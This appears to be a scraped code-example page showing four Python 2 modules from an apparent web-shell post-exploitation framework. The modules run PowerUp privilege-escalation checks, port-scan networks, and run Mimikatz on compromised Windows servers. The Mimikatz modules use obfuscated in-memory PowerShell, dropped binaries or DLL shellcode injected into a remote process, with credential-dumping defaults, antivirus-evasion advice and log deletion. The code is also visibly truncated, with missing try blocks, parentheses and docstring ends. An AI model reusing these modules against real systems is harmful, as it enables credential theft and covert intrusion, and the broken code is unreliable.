예제 #1
class Privesc_powerup(Module):
    _exception_class = PrivescPowerupModuleException
    short_help = "Run Powerup module to assess all misconfiguration for privesc"
    complete_help = r"""
        This module run the Powerup.ps1 script in order to find all possible misconfiguration that can
        lead to a privilege escalation.
        The output of this module will be just informative, no automatic privesc exploitation will be performed.
        Running this module with different users can lead to different results. So it's possible to specify 
        a user to runas this module.
        If no users are provided this module will run under the application pool running user.
        Source Code: 
            #privesc_powerup [username] [password] [domain] [custom_command]
        Positional arguments:
            username                username of the user to runas the process
            password                password of the user to runas the process
            domain                  domain of the user to runas the process
            custom_command          the command to run within the module
                                    Default: ';Invoke-AllChecks'
            Run powerup as the current user
            Run powerup as a specific local user
                #privesc_powerup 'user1' 'password1'
            Run powerup as a specific domain user
                #privesc_powerup 'user1' 'password1' 'domain'
            Run powerup with a custom command, i.e. save report as html
                #privesc_powerup '' '' '' ';Invoke-AllChecks -HTMLReport'


    __default_username = ''
    __default_password = ''
    __default_domain = ''
    __default_custom_command = ';Invoke-AllChecks'

    def __init__(self, password, channel_enc_mode, module_settings,
        Module.__init__(self, password, channel_enc_mode, module_settings,
        self.invoke_ps_module_object = Invoke_ps_module(
            password, channel_enc_mode, module_settings, request_object)
        self.invoke_ps_as_module_object = Invoke_ps_module_as(
            password, channel_enc_mode, module_settings, request_object)

    def __parse_run_args(self, args):
        args_parser = {k: v for k, v in enumerate(args)}
        username = args_parser.get(0, self.__default_username)
        password = args_parser.get(1, self.__default_password)
        domain = args_parser.get(2, self.__default_domain)
        custom_command = args_parser.get(3, self.__default_custom_command)
        return username, password, domain, custom_command

    def run(self, args):
            username, password, domain, custom_command = self.__parse_run_args(
            if username == '' and password == '':
                response = self.invoke_ps_module_object.run(
                    ['PowerUp.ps1', custom_command])
                response = self.invoke_ps_as_module_object.run([
                    'PowerUp.ps1', username, password, custom_command, domain
            parsed_response = self._parse_response(response)
        except ModuleException as module_exc:
            parsed_response = str(module_exc)
        except Exception:
            parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\
        return parsed_response
예제 #2
class Mimikatz(Module):
    _exception_class = MimikatzModuleException
    short_help = "Run an offline version of mimikatz directly in memory"
    complete_help = r"""
        Authors:    @gentilkiwi @PowerShellMafia
        Links:      https://github.com/gentilkiwi/mimikatz
        Credits:    @phra
        This module allows you to run mimikatz in a versatile way.
        Within this module it is possible to run mimikatz in 3 different ways:
            'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory;
            'exe': the classic mimikatz binary will be uploaded to the server and run with arguments;
            'dll': convert mimikatz dll into a position independent shellcode and inject into a remote process.
        It is recommended to run the ps1 version because it will be obfuscated and run from memory.
        The exe version will be just dropped as clear and could be catched by av scanners.
        The dll version is the most stealthy but it doesn't support impersonation atm.
            #mimikatz [exec_type] [username] [password] [domain] [custom_command]
        Positional arguments:
            exec_type               execution type for running mimikatz:
                                        'ps1' will upload and execute the powershell version of mimikatz
                                        'exe' will upload and execute the classic version of binary mimikatz
                                        'dll' will inject converted dll shellcode into a remote process
                                    Default: 'ps1'
            username                username of the user to runas the process
            password                password of the user to runas the process
            domain                  domain of the user to runas the process
            custom_command          based on exec_type, the custom command could be:
                                        - 'ps1' : powershell code to add to the ps1 mimikatz module;
                                        - 'exe' : command line arguments to the mimikatz binary;
                                        - 'dll' : command line arguments to be executed.
                                        'ps1': ';Invoke-Mimikatz -DumpCreds'
                                        'exe': 'privilege::debug sekurlsa::logonpasswords exit'  
                                        'dll': 'privilege::debug sekurlsa::logonpasswords exit'  
            Run mimikatz as the current user
            Run mimikatz dll
                #mimikatz 'dll'
            Run mimikatz as a specific local user
                #mimikatz 'ps1' 'user1' 'password1'
            Run mimikatz as a specific domain user
                #mimikatz 'ps1' 'user1' 'password1' 'domain'
            Run exe version of mimikatz as the current user
                #mimikatz 'exe'
            Run exe version of mimikatz as a specific user
                #mimikatz 'exe' 'user1' 'password1'
            Run mimikatz with a custom command, i.e. dumping cert
                #mimikatz 'ps1' '' '' '' ';Invoke-Mimikatz -DumpCerts'
            Run mimikatz binary with a custom command, i.e. coffee :)
                #mimikatz 'exe' '' '' '' 'coffee exit'


    __default_exec_type = 'ps1'
    __default_username = ''
    __default_password = ''
    __default_domain = ''
    __default_ps_command = ';Invoke-Mimikatz -DumpCreds'
    __default_exe_command = 'privilege::debug sekurlsa::logonpasswords exit'

    def __init__(self, password, channel_enc_mode, module_settings,
        Module.__init__(self, password, channel_enc_mode, module_settings,
        self.upload_module_object = Upload(password, channel_enc_mode,
                                           module_settings, request_object)
        self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode,
                                               module_settings, request_object)
        self.runas_module_object = Runas(password, channel_enc_mode,
                                         module_settings, request_object)
        self.invoke_ps_module_object = Invoke_ps_module(
            password, channel_enc_mode, module_settings, request_object)
        self.invoke_ps_as_module_object = Invoke_ps_module_as(
            password, channel_enc_mode, module_settings, request_object)
        self.inject_dll_srdi_module_object = Inject_dll_srdi(
            password, channel_enc_mode, module_settings, request_object)

    def __parse_run_args(self, args):
        args_parser = {k: v for k, v in enumerate(args)}
        exec_type = args_parser.get(0, self.__default_exec_type)
        username = args_parser.get(1, self.__default_username)
        password = args_parser.get(2, self.__default_password)
        domain = args_parser.get(3, self.__default_domain)
        custom_command = args_parser.get(
            4, self.__default_exe_command
            if exec_type != 'ps1' else self.__default_ps_command)
        return exec_type, username, password, domain, custom_command

    def __lookup_exe_binary(self):
        if 'mimikatz.exe' in self._module_settings.keys():
            bin_path = self._module_settings['mimikatz.exe']
            exe_path = config.modules_paths + 'exe_modules/mimikatz.exe'
            remote_upload_path = self._module_settings[
                'env_directory'] + '\\' + random_generator() + '.exe'
            print '\n\n\nUploading mimikatz binary....\n'
            upload_response = self._parse_response(
                self.upload_module_object.run([exe_path, remote_upload_path]))
            print upload_response
            self._module_settings['mimikatz.exe'] = remote_upload_path
            bin_path = remote_upload_path
        return bin_path

    def __run_exe_version(self, username, password, domain, custom_command):
        remote_upload_path = self.__lookup_exe_binary()
        if username == '':
            response = self.exec_cmd_module_object.run(
                ['""' + remote_upload_path + '""' + ' ' + custom_command])
            response = self.runas_module_object.run([
                remote_upload_path + ' ' + custom_command, username, password,
        parsed_response = self._parse_response(response)
        return parsed_response

    def __run_dll_version(self, username, custom_command):
        dll_name = 'powerkatz.dll'
        exported_function_name = 'powershell_reflective_mimikatz'
        log_file = self._module_settings[
            'env_directory'] + '\\' + random_generator()
        exported_function_data = str(
            ('"log ' + log_file + '" ' + custom_command +
        if username == '':
            print '\n\nInjecting converted DLL shellcode into remote process...'
            response = self.inject_dll_srdi_module_object.run([
                dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',
                exported_function_name, exported_function_data
            response = self._parse_response(response)
            response += '\nDLL injection executed!\n\n\nOutput of mimikatz:\n\n'
            response += self._parse_response(
                    ['type ' + log_file + ' & del /f /q ' + log_file]))
            raise self._exception_class(
                '#mimikatz: exec_type "dll" does not support the runas function atm\n'
        parsed_response = self._parse_response(response)
        return parsed_response

    def __run_ps_version(self, username, password, domain, custom_command):
        if username == '':
            response = self.invoke_ps_module_object.run(
                ['Invoke-Mimikatz.ps1', custom_command])
            response = self.invoke_ps_as_module_object.run([
                'Invoke-Mimikatz.ps1', username, password, custom_command,
        parsed_response = self._parse_response(response)
        return parsed_response

    def run(self, args):
            exec_type, username, password, domain, custom_command = self.__parse_run_args(
            if exec_type == 'exe':
                response = self.__run_exe_version(username, password, domain,
            elif exec_type == 'dll':
                response = self.__run_dll_version(username, custom_command)
                response = self.__run_ps_version(username, password, domain,
            parsed_response = self._parse_response(response)
        except ModuleException as module_exc:
            parsed_response = str(module_exc)
        except Exception:
            parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\
        return parsed_response
예제 #3
class Net_portscan(Module):
    _exception_class = NetPortscanModuleException
    short_help = "Run a port scan using regular sockets, based (pretty) loosely on nmap"
    complete_help = r"""
        This module run the Invoke-Portscan.ps1 script in order to perform a portscan on a host or network.
        Source Code: 
            #net_portscan hosts [ports] [custom_arguments]
        Positional arguments:
            hosts                   ip or hostnames to scan
                                    ranges can be used with "-" separator or CIDR notation
            ports                   ports to be scanned
                                    different ports can be specified using ',' separator
                                    ranges can be used with "-" separator
                                    Default: 'Top25'
            custom_arguments        custom arguments for ps1 module
                                    Default: ' -T 3 '
            Run default portscan on a subnet
            Run portscan on specific ports
                #net_portscan '445'
            Run portscan on specific ports and with aggressive mode
                #net_portscan '445' ' -T 5 '


    __default_ports = 'default'
    __default_custom_arguments = ' -T 3 '
    __appended_code_ps_module = ';Invoke-Portscan -Hosts "%s" %s %s -oN %s'

    def __init__(self, password, channel_enc_mode, module_settings,
        Module.__init__(self, password, channel_enc_mode, module_settings,
        self.invoke_ps_module_object = Invoke_ps_module(
            password, channel_enc_mode, module_settings, request_object)
        self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode,
                                               module_settings, request_object)

    def __parse_run_args(self, args):
        if len(args) < 1:
            raise self._exception_class(
                '#net_portscan: Not enough arguments. 1 Argument required.\n')
        args_parser = {k: v for k, v in enumerate(args)}
        hosts = args_parser.get(0)
        ports = args_parser.get(1, self.__default_ports)
        custom_arguments = args_parser.get(2, self.__default_custom_arguments)
        return hosts, ports, custom_arguments

    def __gen_appended_code(self, hosts, ports, custom_arguments, output_file):
        ports = '-TopPorts 25' if ports == 'default' else '-Ports "' + ports + '"'
        appended_code = self.__appended_code_ps_module % (
            hosts, ports, custom_arguments, output_file)
        return appended_code

    def run(self, args):
            hosts, ports, custom_arguments = self.__parse_run_args(args)
            output_file = self._module_settings[
                'env_directory'] + '\\' + random_generator()
            appended_code = self.__gen_appended_code(hosts, ports,
                    ['Invoke-Portscan.ps1', appended_code]))
            response = self.exec_cmd_module_object.run(
                ['type ' + output_file + ' & del /f /q ' + output_file])
            parsed_response = self._parse_response(response)
        except ModuleException as module_exc:
            parsed_response = str(module_exc)
        except Exception:
            parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\
        return parsed_response
예제 #4
class Mimikatz(Module):
    _exception_class = MimikatzModuleException
    short_help = "Run an offline version of mimikatz directly in memory"
    complete_help = r"""
        This module allows you to run mimikatz in a versatile way.
        Within this module it is possible to run mimikatz in 2 different way:
            'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory;
            'exe': the classic mimikatz binary will be uploaded to the server and run with arguments.
        It is recommended to run the ps1 version because it will be obfuscated and run from memory.
        The exe version will be just dropped as clear and could be catched by av scanners.
        Exec_Type can be 'ps1' or 'exe'. 
        Source Code: 
            #mimikatz [exec_type] [username] [password] [domain] [custom_command]
        Positional arguments:
            exec_type               type of running mimikatz.
                                    'ps1' will upload and execute the powershell version of mimikatz
                                    'exe' will upload and execute the classic version of binary mimikatz
                                    Default: 'ps1'
            username                username of the user to runas the process
            password                password of the user to runas the process
            domain                  domain of the user to runas the process
            custom_command          based on exec_type, the custom command could be:
                                        - 'ps1' : powershell code to add to the ps1 mimikatz module;
                                        - 'exe' : command line arguments to the mimikatz binary;
                                        'ps1': ';Invoke-Mimikatz -DumpCreds'
                                        'exe': 'privilege::debug sekurlsa::logonpasswords exit'  
            Run mimikatz as the current user
            Run mimikatz as a specific local user
                #mimikatz 'ps1' 'user1' 'password1'
            Run mimikatz as a specific domain user
                #mimikatz 'ps1' 'user1' 'password1' 'domain'
            Run exe version of mimikatz as the current user
                #mimikatz 'exe'
            Run exe version of mimikatz as a specific user
                #mimikatz 'exe' 'user1' 'password1'
            Run mimikatz with a custom command, i.e. dumping cert
                #mimikatz 'ps1' '' '' '' ';Invoke-Mimikatz -DumpCerts'
            Run mimikatz binary with a custom command, i.e. coffee :)
                #mimikatz 'exe' '' '' '' 'coffee exit'


    __default_exec_type = 'ps1'
    __default_username = ''
    __default_password = ''
    __default_domain = ''
    __default_ps_command = ';Invoke-Mimikatz -DumpCreds'
    __default_exe_command = 'privilege::debug sekurlsa::logonpasswords exit'

    def __init__(self, password, channel_enc_mode, module_settings,
        Module.__init__(self, password, channel_enc_mode, module_settings,
        self.upload_module_object = Upload(password, channel_enc_mode,
                                           module_settings, request_object)
        self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode,
                                               module_settings, request_object)
        self.runas_module_object = Runas(password, channel_enc_mode,
                                         module_settings, request_object)
        self.invoke_ps_module_object = Invoke_ps_module(
            password, channel_enc_mode, module_settings, request_object)
        self.invoke_ps_as_module_object = Invoke_ps_module_as(
            password, channel_enc_mode, module_settings, request_object)

    def __parse_run_args(self, args):
        args_parser = {k: v for k, v in enumerate(args)}
        exec_type = args_parser.get(0, self.__default_exec_type)
        username = args_parser.get(1, self.__default_username)
        password = args_parser.get(2, self.__default_password)
        domain = args_parser.get(3, self.__default_domain)
        custom_command = args_parser.get(
            4, self.__default_exe_command
            if exec_type == 'exe' else self.__default_ps_command)
        return exec_type, username, password, domain, custom_command

    def __lookup_exe_binary(self):
        if 'mimikatz.exe' in self._module_settings.keys():
            bin_path = self._module_settings['mimikatz.exe']
            exe_path = config.modules_paths + 'exe_modules/mimikatz.exe'
            remote_upload_path = self._module_settings[
                'env_directory'] + '\\' + random_generator() + '.exe'
            print '\n\n\nUploading mimikatz binary....\n'
            upload_response = self._parse_response(
                self.upload_module_object.run([exe_path, remote_upload_path]))
            print upload_response
            self._module_settings['mimikatz.exe'] = remote_upload_path
            bin_path = remote_upload_path
        return bin_path

    def __run_exe_version(self, username, password, domain, custom_command):
            remote_upload_path = self.__lookup_exe_binary()
            if username == '':
                response = self.exec_cmd_module_object.run(
                    ['""' + remote_upload_path + '""' + ' ' + custom_command])
                response = self.runas_module_object.run([
                    remote_upload_path + ' ' + custom_command, username,
                    password, domain
            parsed_response = self._parse_response(response)
        except ModuleException as module_exc:
            parsed_response = str(module_exc)
        return parsed_response

    def __run_ps_version(self, username, password, domain, custom_command):
        if username == '':
            response = self.invoke_ps_module_object.run(
                ['Invoke-Mimikatz.ps1', custom_command])
            response = self.invoke_ps_as_module_object.run([
                'Invoke-Mimikatz.ps1', username, password, custom_command,
        parsed_response = self._parse_response(response)
        return parsed_response

    def run(self, args):
            exec_type, username, password, domain, custom_command = self.__parse_run_args(
            if exec_type == 'exe':
                response = self.__run_exe_version(username, password, domain,
                response = self.__run_ps_version(username, password, domain,
            parsed_response = self._parse_response(response)
        except ModuleException as module_exc:
            parsed_response = str(module_exc)
        except Exception:
            parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\
        return parsed_response